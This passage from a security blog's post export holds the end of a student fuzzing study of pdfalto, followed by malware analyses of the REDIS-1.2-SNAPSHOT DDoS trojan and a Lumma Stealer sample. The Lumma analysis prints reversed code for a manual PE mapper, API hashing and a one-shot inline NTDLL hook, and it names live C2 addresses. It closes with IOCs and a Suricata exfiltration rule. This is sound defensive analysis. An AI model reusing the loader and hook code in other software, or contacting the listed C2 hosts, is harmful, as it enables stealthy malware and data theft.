trigger deeper code paths. In contrast, AFL produced significant results in 12 hours. We think that expanding the initial input corpus even further might improve results for HonggFuzz, although it might also be the case that HonggFuzz is fundamentally unsuited for fuzzing pdfalto for one reason or another.\nAs aforementioned, we first ran experiments with AFL and HonggFuzz using a single input file (not included in the testing table). It turns out that fuzzers with limited or generic initial corpora struggled to find flaws. After expanding our input corpus, AFL demonstrated its ability to find flaws across different inputs. This suggests that expanding the initial input corpus is generally more effective than extending the duration of fuzzing.\nEase of Setup Instrumentation-based tools required modifications to the codebase (e.g., enabling ASan or modifying recursion levels for AFL testing). This setup was quite complex, and we often had to spend quite a lot of time in order to get the project to compile and run properly. Mutation-based tools Zzuf and Radamsa were simpler to deploy because they did not require us to compile code with their dedicated compilers.\nMutation-based tools like Zzuf and Radamsa showed tool-specific error discovery patterns, revealing distinct issues with identical inputs. They both reported a large number of syntax errors, which were not reported by HonggFuzz and AFL.\nOverall conclusion In conclusion, we ran 6 fuzzing experiments on pdfalto with AFL (with and without ASan), HonggFuzz, Zzuf (with and without ASan) and Radamsa. AFL was the most effective tool in our case, and we fixed many of the bugs that led to the crashing inputs that it found. HonggFuzz was completely ineffective. Zzuf and Radamsa found some superficial and repetitive errors. Our results seem to confirm the existing notions that (1) intrumentation-based fuzzers are more effective at finding interesting bugs than mutation-based fuzzers, and (2) having a larger and more varied initial input corpus is more important than running a fuzzer for a longer time.\n","permalink":"https://blacksugar.top/posts/pdfalto/","summary":"\u003cp\u003eAs part of the \u003cem\u003eSoftware Security\u003c/em\u003e  course at Radboud University, I conducted a fuzzing project targeting \u003cstrong\u003e\u003ca href=\"https://github.com/kermitt2/pdfalto\"\u003epdfalto\u003c/a\u003e\u003c/strong\u003e, a command-line tool that converts PDF files into structured XML representations (ALTO format). The tool is written in C++ and relies heavily on the \u003cstrong\u003e\u003ca href=\"https://www.xpdfreader.com/\"\u003expdf library\u003c/a\u003e\u003c/strong\u003e library, which is also implemented in C++.\u003c/p\u003e\n\u003cp\u003eWe chose pdfalto because the PDF format is notoriously complex and error-prone, and the project seemed to have practical relevance — used in real-world contexts but not widely tested with fuzzing tools. The goal was to explore the effectiveness of several fuzzers and to identify potential bugs or vulnerabilities.\u003c/p\u003e","title":"「平仲」A Glance of Fuzzing"},{"content":"0x00 Introduction REDIS-1.2-SNAPSHOT is a DDoS trojan that exploits Redis vulnerabilities to infiltrate and install itself. The attack leverages Redis replica (slave) backup mechanisms to write a .so file onto the target machine and then directly load that shared library to execute system commands, thereby achieving installation of the REDIS-1.2-SNAPSHOT trojan. The REDIS-1.2-SNAPSHOT DDoS trojan builds command-and-control on Redis and can launch TCP and UDP flood attacks; it can also carry out targeted DDoS attacks against Minicraft game servers\u0026rsquo; handshake, login, and MTOD connections. The trojan also uses SLAVE backup and BYTE-write methods to attack other Redis servers.\n0x01 Dynamic Analysis Uploaded the trojan to the threatbook online sandbox and observed network traffic communicating with 45.41.240.51:6379 (sensitive Redis port).\n0x02 Static Analysis Using DIE to inspect the trojan, it was determined to be written in Go and not packed. Examining the strings in IDA also indicates the trojan has essentially no obfuscation or hardening.\nThe relevant functions and methods in the trojan are shown below.\n0x03 Main Function Directly examining the main_main method shows that the Redis key 45.41.240.51 is hardcoded. The main_getIP method is used to obtain the current device’s external IP address.\nAfter obtaining the external IP, the trojan creates two goroutines: main_cleanusing and main_shutdownwatch.\nAfter the goroutines are successfully created, it proactively calls the main_connect method; main_connect then calls the main_listen function.\nIn the main_listen method it spawns a new goroutine that calls main_listen_func3; main_listen_func3 in turn calls main_listen2. Meanwhile, the trojan\u0026rsquo;s main goroutine polls the specified KEY and receives control instructions issued by the command-and-control server.\n0x04 SUB subscription command In main_listen2, the trojan subscribes to messages from the remote Redis server. The subscribed message queue is \u0026quot;887c194f-e726-4143-8cb7-71bea67752f5///\u0026quot; + the external IP address. When a message is received from the queue, it invokes main_listen2_func2 for processing, which in turn calls main_decode for further handling.\nMessages are subscribed to via PubSubConn, as shown below.\nAfter subscribing to messages with Subscribe, the trojan periodically uses Ping to check the connectivity of the Redis server.\n0x05 GET polling command In the main goroutine main_listen, the trojan directly establishes a connection with the Redis server. If the connection cannot be created, it sleeps for a fixed period before retrying.\nAfter the connection is successfully established, the trojan actively reads string messages from the \u0026quot;atkavxc\u0026quot; key. The retrieved messages are then passed to main_decode for decryption.\n0x06 DEC command decryption After obtaining commands through SUB subscription or GET polling, the trojan decrypts them using main_decode, which in turn calls main_DecryptAES for AES decryption.\nThe decryption code for main_DecryptAES is shown below, where the decryption key main_Key is itself decrypted within the main_init method.\nThe AES key handling code in main_init is as follows.\n0x07 MET command execution The decrypted command is deserialized into a JSON object, and fields such as method, target, and uniqueAttackID are extracted step by step for subsequent command execution.\nDifferent operations are performed depending on the command fields (e.g., method, target, etc.).\n7.1 UDP and TCP FLOOD attacks TCP FLOOD attack When METHOD equals 6 and TARGET is socket (as below — requires reversing and concatenating the string), the trojan parses fields such as length, threads, etc.\nVia the SOCKETFlood_func1 method it calls dosocket, creating the number of goroutines specified by threads to establish TCP connections with the target server or network segment.\nBelow is the code related to CIDR subnet matching.\nUDP FLOOD attack When METHOD equals 3 and TARGET is udp (as shown below — requires reversing and concatenating the string), the trojan parses fields such as length, threads, etc.\nVia the UDPFlood_func1 method it calls method_do, creating the number of goroutines specified by threads to establish UDP connections with the target server or network segment.\n7.2 REDIS FLOOD attack REDIS CPS attack When TARGET is redis-cps (as shown below — requires reversing and concatenating the string), the trojan parses fields such as threads, delay, and reflectionIPs.\nparse reflectionIPs\nIt creates the number of goroutines specified by threads; each goroutine runs REDISCPSflood_func1, and REDISCPSflood_func1 in turn calls sendcpsredis.\nThe sendcpsredis method configures the remote Redis instance as a SLAVE to synchronize the attack exploit (EXP).\nREDIS-BYTE command When METHOD equals 10 and TARGET is redis-byte (as shown below — requires reversing and concatenating the string), it parses fields such as threads, delay, and reflectionIPs.\nIt creates the number of goroutines specified by threads; each goroutine runs REDISBYTEflood_func1, and REDISBYTEflood_func1 in turn calls redis_methods_redisbyteflood.\n7.3 MINECRAFT FLOOD attack Uses the Infrared codebase to encapsulate Minecraft handshake, login, and MOTD packets for targeted DDoS attacks against Minecraft game servers.\nHANDSHAKE FLOOD attack When METHOD equals 9 and TARGET is handshake (as shown below — requires reversing and concatenating the string), the trojan parses fields such as threads and then calls sendhs to carry out the attack.\nUses the Infrared codebase to craft Minecraft handshake packets and send them to the target server to carry out the attack.\nMOTD FLOOD attack When METHOD equals 4 and TARGET is MOTD (as shown below — requires reversing and concatenating the string), the trojan parses fields such as threads and then calls func1 to handle the attack.\nUses the Infrared codebase to craft Minecraft MOTD (Message Of The Day) packets and send them to the target server to carry out the attack.\nLOGIN FLOOD attack When METHOD equals 5 and TARGET is login (as shown below — requires reversing and concatenating the string), the trojan parses fields such as threads and then calls func1 to handle the attack.\nUses the Infrared codebase to construct Minecraft LOGIN packets and send them to the target server to carry out the attack.\n0x08 shutdown method The main_shutdown method attempts to establish a connection to the attacker\u0026rsquo;s Redis server.\nAfter successfully establishing the Redis connection, the trojan publishes the current device\u0026rsquo;s IP to the \u0026quot;8f0df21e-9b9f-4a12-acf4-43f9df738050\u0026quot; key to report the information.\nThe trojan actively reads the remote Redis shutdown value; if it finds the value equals DIE, it exits immediately and prints the message: \u0026quot;Asked to die cuz yeh\u0026quot;.\n0x9 IOC sha256 redis-1.2-snapshot d4238ffc217e039eaf5cc89cf387df58b67d01129b88e0b053e16c37ae09192d ","permalink":"https://blacksugar.top/posts/redis_snapshot/","summary":"\u003ch2 id=\"0x00-introduction\"\u003e0x00 Introduction\u003c/h2\u003e\n\u003cp\u003eREDIS-1.2-SNAPSHOT is a DDoS trojan that exploits Redis vulnerabilities to infiltrate and install itself. The attack leverages Redis replica (slave) backup mechanisms to write a \u003ccode\u003e.so\u003c/code\u003e file onto the target machine and then directly load that shared library to execute system commands, thereby achieving installation of the REDIS-1.2-SNAPSHOT trojan. The REDIS-1.2-SNAPSHOT DDoS trojan builds command-and-control on Redis and can launch TCP and UDP flood attacks; it can also carry out targeted DDoS attacks against Minicraft game servers\u0026rsquo; handshake, login, and MTOD connections. The trojan also uses SLAVE backup and BYTE-write methods to attack other Redis servers.\u003c/p\u003e","title":"「平仲」Analysis of the REDIS-SNAPSHOT DDoS Trojan"},{"content":"LUMMA offers Malware-as-a-Service (MaaS) for information-stealing trojans, enabling its customers to directly build trojans on the platform. The MaaS platform also supports parsing, extracting, and retrieving stolen data such as databases and text files, significantly lowering the barrier to entry for data theft attacks. The LUMMA technical development team continues to refine the trojan\u0026rsquo;s data exfiltration capabilities, which currently include stealing browser data, cryptocurrency keys, KEEPASS password databases, and more. To effectively evade antivirus solutions, LUMMA does not employ VMProtect (VMP) packing technology but instead utilizes a string obfuscation method referred to by the technical team as the \u0026ldquo;MORPHER\u0026rdquo; solution.\nThis instance of Lumma Stealer was discovered on an image resource website. Graphic designers within companies often search for art resources across various websites, making them potential targets for attackers. By uploading such malicious files, attackers can easily compromise users who lack the ability to identify threats, leading them to execute the malicious files.\nGiven the relatively simple functionality of this sample, this article provides only a preliminary analysis of its core data-theft capabilities through dynamic debugging.\nHowever, in stark contrast to its straightforward malicious behavior, the sample employs a notably complex dynamic loading mechanism. The latter half of this article will therefore focus on an in-depth analysis of this Loading Mechanism.\nStatic Analysis As we can see, the original compressed package is only about 2MB.\nAfter extraction, there exists a file named \u0026ldquo;Case example of work_1\u0026rdquo; with the .scr extension (while the rest are numerous JPG files each around 2MB in size). The size of this .scr file directly reaches 720MB. It is also worth noting that with file extensions hidden, the file appears indistinguishable from a regular image file, making it highly susceptible to triggering unintended execution.\nWhen examining this file with a binary editor, it can be observed that it contains extensive null-byte padding. This technique is commonly used to bypass antivirus detection, as security software typically does not perform deep scans on very large files.\nDIE (Detect It Easy) failed to identify any valid packer or protector information. This suggests that the file might be either unprotected, or utilizing a custom/obscure packing method that is not recognized by the tool\u0026rsquo;s signature database.\nAfter loading the file into IDA, it prompts a too big function error. As expected, the attacker has likely implemented obfuscation techniques to complicate analysis.\nAfter modifying the IDA \u0026ldquo;max function size\u0026rdquo; configuration and reopening the file, it is evident that the code contains numerous meaningless repetitive code segments with multi-layered nested loops. The purposes of these techniques are:\nTo artificially inflate the size of functions To interfere with Hex-Rays decompilation To trigger \u0026ldquo;too big function\u0026rdquo; errors in analysis tools To delay and hinder the analysis process It should be noted that these obfuscation methods do not affect the actual execution logic of the program.\nChecking the export table, no suspicious imported functions have been identified for now. It is speculated that key DLLs or functions are dynamically loaded into memory and decrypted during runtime for execution. The next step will shift to dynamic analysis.\nDynamic Analysis Anti-Anti-Debugging After directly running the malware through x64dbg, it terminated rapidly, clearly indicating the presence of anti-debugging measures. Setting a breakpoint at IsDebuggerPresent reveals that the return value is 1, confirming that the Trojan has enabled anti-debugging checks. This can be bypassed simply by modifying the return value.\nAlternatively, for a more convenient approach, using the Basic configuration option in ScyllaHide can achieve the same result of bypassing the anti-debugging protection.\nNetwork Request Breakpoint Through Huorong Sword analysis, it can be observed that the program attempts to connect to the remote C2 server at 82.118.23.50.\nAfter execution, examining the symbols loaded by the Trojan reveals the presence of winhttp.dll. This DLL was not initially loaded when the process was first attached in x32dbg, indicating it was dynamically decrypted during runtime. This observation aligns with the earlier hypothesis based on static analysis.\n(The specific decryption logic would require dynamic debugging of LoadLibrary/GetProcAddress calls to determine exactly when winhttp.dll is loaded, which is a complex process and will be discussed later.)\nA breakpoint has been set at WinHttpConnect for further analysis.\nContinuing with single-step debugging, the remote C2 address and API endpoint (/c2sock) of the Trojan have been identified. It can be observed that the Trojan uses the HTTP POST method to transmit data to the server. The presence of a \u0026ldquo;boundary\u0026rdquo; string suggests that the Trojan uploads various types of user files. The next step involves conducting a detailed dynamic analysis of the data uploaded by the Trojan.\nThe following describes how the malware program traverses and scans the User Data directories of browsers such as Chrome, Chromium, and Edge:\nThe malware attempts to read configurations of applications such as FileZilla, AnyDesk, KeePass, Steam, etc., in order to steal sensitive information.\nScanning for encrypted wallet data. The relevant paths can be dumped, with partial fields shown below. The string dx765 is used as a delimiter and obfuscation field to evade detection.\nThe communication traffic can also be captured using Wireshark, revealing that the data is transmitted via HTTP POST requests in plaintext.\nTechnical Analysis of the Trojan’s Dynamic Loading Mechanism The previous sections have already described the core functionality of the malware. In this section, we conduct a deeper analysis of the dynamic loading and control-flow disruption techniques that were observed during debugging.\nDynamic Loading Chain Analysis We set a breakpoint on ntdll.LdrLoadDll, and after several hits we observed the DLL loading process in action. By repeatedly using “Execute till return”, we continued stepping out of system DLL frames until the execution finally reached a region of non-DLL (user module) address space.\nAfter the jump, the address changes to 03CD5BF7.\nChecking the Modules view revealed that execution had now entered the address space of a module named utilman.exe.\nExamining the surrounding context showed that utilman.exe invoked LoadLibraryW, and the argument passed to it was winhttp.dll. This indicates that utilman.exe was acting as a loader at this stage of execution. The remaining question is: how was utilman.exe itself invoked in the first place?\nWe then inspected the call stack to trace the call chain.\nThe resulting call chain is as follows:\nntdll … -\u0026gt; case_example.00401233 -\u0026gt; case_example.004251D0 -\u0026gt; kernelbase.HeapDestroy -\u0026gt; case_example.00401D1A ← malware -\u0026gt; utilman.03CCA273 ← malware utilman -\u0026gt; utilman.03CCEEDA ← call LoadLibraryW(\u0026#34;winhttp.dll\u0026#34;) We then examined the disassembly around address 0x401D1A.\nlet\u0026rsquo;s translate the assembly a bit\n; === This is where utilman.exe is actually loaded === 00401CC5 mov dword ptr [esp+4], offset 586D26h ; L\u0026#34;utilman.exe\u0026#34; 00401CCD mov eax, dword ptr [ebp-24] 00401CD0 mov dword ptr [esp], eax ; 1st argument = [ebp-24] 00401CD3 mov eax, dword ptr [ebp-10] ; eax = function pointer 00401CD6 call eax ; fn([ebp-24], L\u0026#34;utilman.exe\u0026#34;) 00401CD8 sub esp, 8 00401CDB mov byte ptr ds:[58B025h], 1 ; global flag: utilman has been loaded ; === Invoke the “stage 1” callback === 00401CE2 mov eax, dword ptr [ebp-28] 00401CE5 mov dword ptr [esp+0Ch], eax ; arg3 = [ebp-28] 00401CE9 mov eax, dword ptr [ebp-24] 00401CEC mov dword ptr [esp+8], eax ; arg2 = [ebp-24] 00401CF0 mov dword ptr [esp+4], 0 00401CF8 mov dword ptr [esp], 0 00401CFF mov eax, dword ptr [ebp-0Ch] ; eax = function pointer #1 00401D02 call eax ; fn1(0, 0, [ebp-24], [ebp-28]) ; === Invoke the “stage 2” callback (this actually jumps into utilman) === 00401D04 sub esp, 10h 00401D07 mov eax, dword ptr [ebp-28] ; offset 00401D0A test eax, eax 00401D0C je 401D1Ah ; if offset == 0, exit 00401D0E mov eax, dword ptr [ebp-28] ; eax = offset 00401D11 mov edx, eax 00401D13 mov eax, dword ptr [ebp-1Ch] ; eax = base 00401D16 add eax, edx ; eax = base + offset 00401D18 call eax ; call (base + offset) 00401D1A nop 00401D1B leave 00401D1C ret This logic becomes fairly straightforward:\nInstead of calling LoadLibraryW directly to load winhttp.dll, the malware first manually maps utilman.exe into its own process, and then leverages a function inside utilman—located via base + offset—to indirectly invoke: LoadLibraryW(L\u0026quot;winhttp.dll\u0026quot;);\nThis block of code at 0x401CAB–0x401D1A functions as a “module + callback loader”, with the following workflow:\nIt constructs the necessary parameters using its own helper routines.\nIt invokes a generic loader function stored at [ebp-10] to load utilman.exe.\nIt sets a global flag to indicate that utilman has been successfully loaded.\nIt calls a callback at [ebp-0C] to perform additional initialization.\nFinally, it computes base + offset to dynamically jump into a specific function inside utilman (address 03CCA273). That internal utilman function subsequently calls:\nLoadLibraryW(L\u0026#34;winhttp.dll\u0026#34;); thereby preparing WinHTTP for the malware’s C2 communications.\nmanual mapper We then moved further up to analyze the function at 0x401924. At this point, we can continue the investigation via static analysis in IDA.\n_DWORD *__cdecl sub_401924(int a1) { _DWORD *result; // eax int v3; // [esp+38h] [ebp-48h] BYREF int v4; // [esp+3Ch] [ebp-44h] unsigned int v5; // [esp+40h] [ebp-40h] int v6; // [esp+44h] [ebp-3Ch] _DWORD *v7; // [esp+48h] [ebp-38h] int v8; // [esp+4Ch] [ebp-34h] int v9; // [esp+50h] [ebp-30h] int v10; // [esp+54h] [ebp-2Ch] unsigned __int16 v11; // [esp+5Ah] [ebp-26h] int v12; // [esp+5Ch] [ebp-24h] int v13; // [esp+60h] [ebp-20h] int v14; // [esp+64h] [ebp-1Ch] _WORD *v15; // [esp+68h] [ebp-18h] unsigned int v16; // [esp+6Ch] [ebp-14h] _DWORD *v17; // [esp+70h] [ebp-10h] int i; // [esp+74h] [ebp-Ch] v14 = a1; v13 = *(_DWORD *)(a1 + 60) + a1; if ( (*(_WORD *)(v13 + 22) \u0026amp; 0x2000) == 0 ) *(_WORD *)(v13 + 22) += 0x2000; v3 = *(_DWORD *)(v13 + 80); v12 = dword_58B03C(-1, \u0026amp;dword_58B02C, 0, \u0026amp;v3, 12288, 64); v11 = *(_WORD *)(v13 + 6); v10 = *(unsigned __int16 *)(v13 + 20) + v13 + 24; v9 = 40 * v11 + v10 - a1; sub_401410(dword_58B02C, a1, v9); for ( i = 0; i \u0026lt; v11; ++i ) sub_401410( dword_58B02C + *(_DWORD *)(40 * i + v10 + 12), *(_DWORD *)(40 * i + v10 + 20) + a1, *(_DWORD *)(40 * i + v10 + 16)); v8 = v13 + 160; v7 = (_DWORD *)(dword_58B02C + *(_DWORD *)(v13 + 160)); v17 = v7; v6 = dword_58B02C - *(_DWORD *)(v13 + 52); v5 = (unsigned int)v7 + *(_DWORD *)(v13 + 164); while ( 1 ) { result = v17; if ( (unsigned int)v17 \u0026gt;= v5 ) break; result = (_DWORD *)*v17; if ( !*v17 ) break; v16 = (unsigned int)(v17[1] - 8) \u0026gt;\u0026gt; 1; v15 = v17 + 2; v4 = dword_58B02C + *v17; while ( v16-- ) { if ( (int)(unsigned __int16)*v15 \u0026gt;\u0026gt; 12 == 3 ) *(_DWORD *)((*v15 \u0026amp; 0xFFF) + v4) += v6; ++v15; } v17 = (_DWORD *)((char *)v17 + v17[1]); } return result; } unsigned int __cdecl sub_401410(int a1, int a2, unsigned int a3) { unsigned int result; // eax unsigned int i; // [esp+Ch] [ebp-4h] for ( i = 0; ; ++i ) { result = i; if ( a3 \u0026lt;= i ) break; *(_BYTE *)(i + a1) = *(_BYTE *)(i + a2); } return result; } At this point, how utilman.exe is brought into the process is clear:\nsub_401924 acts as a manual PE loader (manual mapper), and sub_401410 is the simple memcpy routine it relies on.\nThe function takes a pointer a1 to a PE image (which, at this stage, we can confidently identify as the file image of utilman.exe), remaps it into a newly allocated memory region according to the PE structure layout, and applies relocations.\nAfter this manual mapping is complete, the later base + offset logic can treat this image as if it were a normal DLL, and indirectly jump into an internal utilman function that eventually calls:\nLoadLibraryW(L\u0026#34;winhttp.dll\u0026#34;); thereby completing the setup required for WinHTTP-based C2 communication.\nFollowing sub_401924, we move one level up to analyze its caller at 0x401C50. Going further up the call chain leads back into the previously discussed obfuscated region, which we can safely ignore for the purposes of this analysis. At this point, we can consider our dynamic loading analysis to be essentially complete.\nint __cdecl sub_401C50(int a1) { // 1) Resolve two function pointers from a module (a1 = ??, here dword_58B030) // using the malware’s hash-based API lookup. v10 = (void (__stdcall *)(_DWORD, _DWORD)) sub_40185D(dword_58B030, dword_582108); v9 = (void (__stdcall *)(_DWORD *, const char *, int, int)) sub_40185D(dword_58B030, dword_58210C); v8 = a1; // a1 = raw PE image of utilman.exe v7 = *(_DWORD *)(a1 + 60) + a1; // NtHeaders (a1 + e_lfanew) v6 = *(_DWORD *)(v7 + 40); // OptionalHeader.AddressOfEntryPoint *(_DWORD *)(v7 + 40) = 0; // Clear the original EP to prevent automatic execution // 2) Manually map this PE: the previously analyzed sub_401924 sub_401924(a1); // allocate memory + copy sections + perform relocations // 3) Install the inline hook sub_401B71(); // 4) Use the two dynamically-resolved functions (v9 / v10) as a wrapper layer. // v9(v5, \u0026#34;u\u0026#34;, v2, v3); \u0026lt;-- here v5 is a small structure; \u0026#34;u\u0026#34; appears to be an ID/type. v9(v5, \u0026#34;u\u0026#34;, v2, v3); byte_58B025 = 1; // mark the module as “loaded” v5[0] = \u0026amp;v4; // v5.first = \u0026amp;v4 v4 = v5; // v4 now points to the v5 structure // v10(0, 0) will use v5[0] (which points to v4) to write back the actual base // of the manually-mapped module into v4. v10(0, 0); result = (int)v4; if ( v4 ) // 5) If v4 is not NULL, treat (v4 + original entrypoint offset) as a function pointer // and jump into the mapped utilman image. return ((int (*)(void))((char *)v4 + v6))(); return result; } int __cdecl sub_40185D(int a1, int a2) { int v3; // [esp+14h] [ebp-24h] int v4; // [esp+18h] [ebp-20h] int v5; // [esp+1Ch] [ebp-1Ch] _DWORD *v6; // [esp+20h] [ebp-18h] unsigned int i; // [esp+2Ch] [ebp-Ch] v6 = (_DWORD *)(*(_DWORD *)(*(_DWORD *)(a1 + 60) + a1 + 120) + a1); v5 = v6[7] + a1; v4 = v6[8] + a1; v3 = v6[9] + a1; for ( i = 0; i \u0026lt; v6[7]; ++i ) { if ( a2 == sub_4014AD((char *)(*(_DWORD *)(4 * i + v4) + a1)) ) return *(_DWORD *)(4 * *(unsigned __int16 *)(2 * i + v3) + v5) + a1; } return 0; } sub_40185D: Resolve a function address from a PE image using a hash a1 is the base address of a module in memory. *(a1 + 60) corresponds to the DOS header’s e_lfanew field. a1 + *(a1 + 60) + 120 effectively evaluates to NtHeader + 0x78. At this offset, the malware uses a DataDirectory entry—but treats its RVA as a pointer to a custom structure instead of a standard directory. v6 becomes the base address of this custom structure. unsigned int __cdecl sub_4014AD(char *Str) { unsigned int v3 = 1000; for ( i = 0; strlen(Str) \u0026gt; i; ++i ) v3 += ((v3 \u0026gt;\u0026gt; 2) + Str[i]) ^ 0x10; return v3; } sub_4014AD: Name-hashing function\nThe purpose of this routine is straightforward: it computes a 32-bit hash from a string (typically a function name). This hash is then compared against constants such as dword_582108 and dword_58210C.\nIn other words:\nThe sample has precomputed hash values for specific API names and stored them in constants like dword_582108. At runtime, it iterates over an export-like structure and applies sub_4014AD to each function name. When the computed hash matches a2, the malware considers that function to be the one it is looking for. This is a classic API hashing technique, commonly used to hide real API names and impede static analysis.\nInline API Hook unsigned int sub_401B71() { int v1; // [esp+34h] [ebp-28h] BYREF int v2; // [esp+38h] [ebp-24h] BYREF char v3[7]; // [esp+3Ch] [ebp-20h] BYREF int v4; // [esp+43h] [ebp-19h] BYREF char v5; // [esp+47h] [ebp-15h] int v6[5]; // [esp+48h] [ebp-14h] BYREF dword_58B028 = sub_40185D(dword_58B030, dword_58212C); sub_401410((int)\u0026amp;unk_58B020, dword_58B028, 5u); v6[2] = (int)sub_401693; v6[1] = dword_58B028 + 5; v6[0] = (int)sub_401693 - dword_58B028 - 5; v4 = 233; v5 = 0; sub_401410((int)\u0026amp;v4 + 1, (int)v6, 4u); v2 = 5; v1 = dword_58B028; dword_58B038(-1, \u0026amp;v1, \u0026amp;v2, 64, v3); return sub_401410(dword_58B028, (int)\u0026amp;v4, 5u); } It locates a target function inside the module referenced by dword_58B030 (almost certainly ntdll) by matching its hashed name. It then saves the first five bytes of that function and overwrites them with a JMP sub_401693 instruction.\nRelationship Between 401C50 / 401924 and the Inline Hook Putting the pieces together, the workflow becomes:\nsub_401C50(a1) a1 is the raw PE image of utilman.exe. It invokes sub_401924(a1) to manually map the PE — allocating memory, copying sections, and applying relocations. It then calls sub_401B71(), which: Locates a critical function inside ntdll (or another base module) by matching its hashed name (the hash stored in dword_58212C). Saves the first five bytes of that function into unk_58B020. Uses NtProtectVirtualMemory to make the page writable. Patches those five bytes with a jmp sub_401693, thereby installing an inline hook. Back in sub_401C50, the malware uses the two function pointers v9 and v10—together with the newly installed hook—to register the manually mapped utilman.exe within the system’s loading logic, eventually jumping to its entry point via (v4 + EntryPointRVA). Later, somewhere inside utilman, a call is made to the function that was hooked (dword_58B028). As a result, execution first enters sub_401693, where the malware can: Perform its own custom logic (e.g., extra processing on loaded modules, or API hijacking), and Use the five-byte backup stored in unk_58B020 together with (dword_58B028 + 5) to construct a trampoline, returning execution back to the original unmodified function. And since we previously observed a call to LoadLibraryW(L\u0026quot;winhttp.dll\u0026quot;) inside utilman at address 03CCA273, combining that with the inline-hook mechanism described above, we can conclude that——The malware effectively performs an inline hijack of a system API along the entire execution chain:\nmanual-mapping utilman.exe → installing an inline hook on an NTDLL function → jumping into utilman’s entry point → utilman internally invoking the hooked NTDLL function → execution first being redirected into the malware’s custom logic → and ultimately calling LoadLibraryW(L\u0026quot;winhttp.dll\u0026quot;).\nSo what exactly did the malware hook? _DWORD *__stdcall sub_401693( int a1, int a2, _DWORD *a3, int a4, int a5, int a6, _DWORD *a7, int a8, int a9, int a10) { _DWORD *result; // eax result = (_DWORD *)(unsigned __int8)byte_58B025; if ( byte_58B025 ) { sub_401410((int)dword_58B028, (int)\u0026amp;unk_58B020, 5u); dword_58B028(a1, a2, a3, a4, a5, a6, a7, a8, a9, a10); *a7 = -1; result = a3; *a3 = dword_58B02C; byte_58B025 = 0; } return result; } Step-by-step explanation:\nif (byte_58B025) The hook only executes its logic when byte_58B025 == 1. This flag is set to 1 earlier at 0x401CD8 via the instruction mov byte ptr ds:[58B025], 1. sub_401410((int)dword_58B028, (int)\u0026amp;unk_58B020, 5u); sub_401410 is just a memcpy. dword_58B028 holds the original entry address of the hooked function. unk_58B020 contains the five original bytes that were backed up in sub_401B71. In other words, this line restores the first 5 bytes of the original function, ensuring we don’t recursively re-enter the hook when the function is called. dword_58B028(a1, a2, a3, ..., a10); At this point, dword_58B028 once again points to the genuine function entry, so this is a real call to the original function. *a7 = -1; This sets a field pointed to by a7 to 0xFFFFFFFF, likely serving as some kind of marker or placeholder. *a3 = dword_58B02C; This overwrites the value pointed to by the third argument with dword_58B02C. The hook uses this opportunity to update a field inside an internal loader structure—effectively replacing the module base field with the base address of the manually mapped image. byte_58B025 = 0; Finally, the flag is cleared. Even if execution were to reach sub_401693 again (which in practice is unlikely, since we restored the original 5 bytes), the condition if (byte_58B025) would fail, and the hook would be completely inert. In summary, this hook:\nOn the first invocation of the hooked NT function:\nExecution jumps to the injected jmp sub_401693. sub_401693 restores the original instructions and performs a genuine call to the API once. It then silently overwrites certain output fields in the loader’s internal structures with the address of the manually mapped image. Finally, it marks itself as “used” so that it will not interfere with any subsequent calls. This is a textbook example of a one-shot trampoline hook.\nBy placing a breakpoint on sub_401693 and observing the call stack when it fires, we can see that the function being intercepted is RtlAppendUnicodeStringToString.\nwhy is RtlAppendUnicodeStringToString? When loading any DLL, the Windows loader performs the following sequence of steps:\n1. It constructs a UNICODE_STRING structure representing the module path.\n2. It modifies this structure through a series of Rtl\\*String routines, including:\nRtlInitUnicodeString RtlAppendUnicodeStringToString RtlEqualUnicodeString RtlAnsiStringToUnicodeString …… 3. It then passes the fully constructed UNICODE_STRING to LdrpLoadDll, which performs the actual file open, memory mapping, and module initialization.\nAll of these operations occur inside ntdll.dll, at the lowest level of the loader’s internal implementation.\nAmong these routines, RtlAppendUnicodeStringToString is responsible for:\nappending path components appending file names appending extensions constructing the final, fully-qualified module name In practice, nearly every invocation of LdrLoadDll will call RtlAppendUnicodeStringToString as part of this name-construction process.\nIn other words:\nthe malware exploits this string-append moment inside RtlAppendUnicodeStringToString to inject its “fake” module into the loader’s internal structures, causing the loader to mistakenly treat the manually mapped utilman.exe as if it had been loaded normally by the system.\nWith this, the analysis of the malware’s dynamic loading technique is essentially complete.\nSummary The sample is a variant of Lumma Stealer, an information-stealing malware family with strong obfuscation and dynamic-loading capabilities.\nUses a ~700 MB overlay and junk code to hinder static analysis. Employs anti-debug checks and API hashing to conceal real API names. Implements a manual PE mapper to load utilman.exe in memory without the Windows loader. Installs a one-shot inline hook on RtlAppendUnicodeStringToString to tamper with loader-internal structures and stealthily register the manually mapped module. Leverages utilman to indirectly load winhttp.dll, enabling WinHTTP-based C2 communication. Steals data from browsers, FTP clients, Steam, cryptocurrency wallets, AnyDesk, KeePass, and other applications. Exfiltrates collected data via plaintext multipart POST requests to 82.118.23.50. In short, this sample combines manual mapping, inline NTDLL hooking, dynamic module hijacking, and broad credential theft, aligning closely with known Lumma Stealer behavior.\nIOC sha256 eadaa17ba90ac05bec49ce116a4180ba092d120e644109dac5e0d7896f69009b IP 82.118.23.50 suricata alert http $HOME_NET any -\u0026gt; $EXTERNAL_NET any (msg:\u0026ldquo;ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2\u0026rdquo;; flow:established,to_server; http.method; content:\u0026ldquo;POST\u0026rdquo;; http.uri; bsize:7; content:\u0026quot;/c2sock\u0026quot;; nocase; http.request_body; content:\u0026ldquo;Content-Disposition|3a 20|form-data|3b 20|name|3d 22|file|22 3b 20|filename|3d 22|file|22 0d 0a|Content-Type|3a 20|attachment/x-object|0d 0a 0d 0a|PK\u0026rdquo;; fast_pattern; content:\u0026ldquo;Content-Disposition|3a 20|form-data|3b 20|name|3d 22|hwid|22 0d 0a 0d 0a 7b|\u0026rdquo;; pcre:\u0026quot;/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\x7d/R\u0026quot;; content:\u0026ldquo;Content-Disposition|3a 20|form-data|3b 20|name|3d 22|pid|22|\u0026rdquo;; content:\u0026ldquo;Content-Disposition|3a 20|form-data|3b 20|name|3d 22|lid|22|\u0026rdquo;; reference:md5,9dcde1edfdd83f7cc28dcd31323be326; reference:md5,b3b025b8445dcbd9b7aca560ad752b74; classtype:trojan-activity; sid:2043206; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2023_01_04, deployment Perimeter, malware_family lumma, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 